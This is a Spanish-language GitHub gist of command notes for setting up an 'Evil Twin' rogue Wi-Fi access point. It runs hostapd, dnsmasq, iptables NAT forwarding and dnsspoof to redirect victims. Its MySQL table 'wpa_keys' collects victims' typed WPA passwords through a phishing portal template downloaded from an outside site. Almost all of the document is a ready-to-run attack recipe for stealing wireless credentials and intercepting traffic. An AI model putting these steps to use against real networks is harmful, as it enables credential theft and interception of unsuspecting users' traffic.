Skip to content

Instantly share code, notes, and snippets.

@b3nj1-1
Last active February 22, 2022 00:31
Show Gist options
  • Save b3nj1-1/f89a9279cbba42c26c6d00838ec9b30d to your computer and use it in GitHub Desktop.
Save b3nj1-1/f89a9279cbba42c26c6d00838ec9b30d to your computer and use it in GitHub Desktop.

Evil Twin

NOTA: Asignar ip a la tarjeta de red ifconfig wlan0 10.0.0.1 netmask 255.255.255.0

Colocar la tarjeta en modo monitor:

airmon-ng start <IR>

Para colocar de nuevo la tarjeta en modo normal:

airmon-ng stop <IR>

Crear los dos archivos: * dnsmaq.conf * hostapd.conf

	hostapd hostapd.conf
	dnsmasq -C dnsmasq.conf -d

Para hacer forwarding para que los paquetes pasen:

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Tambien debemos configurar el firewall:

# para ver las reglas
iptables -L

iptables --tables nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface <IR> -j ACCEPT

Habilitar forward de paquetes:

	echo 1 > /proc/sys/net/ipv4/ip_forward

Para hacer algo mas custom

Creamos una base de datos para guardar todo:

service mysql start
mysql
	create database apfake;
	create user apfakeuser;
	grant all on apfake.* to 'apfakeuser'@'localhost' identified by 'erik123';
	use apfake;
	create table wpa_keys(pass1 varchar(30), pass2 varchar(30));
	alter database apfake character set 'utf8';

	# Podemos consultar

	select * from wpa_keys;

Vamos a la ruta del servidor web (www/html), podemos el archivo que descargamos aqui: Descargar plantilla de aqui: https://www.shellvoide.com/media/files/rogueap.zip#

Haremos uso de dnsspoof:

dnsspoof -i <IR>

Con esto tendremos todo creado.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment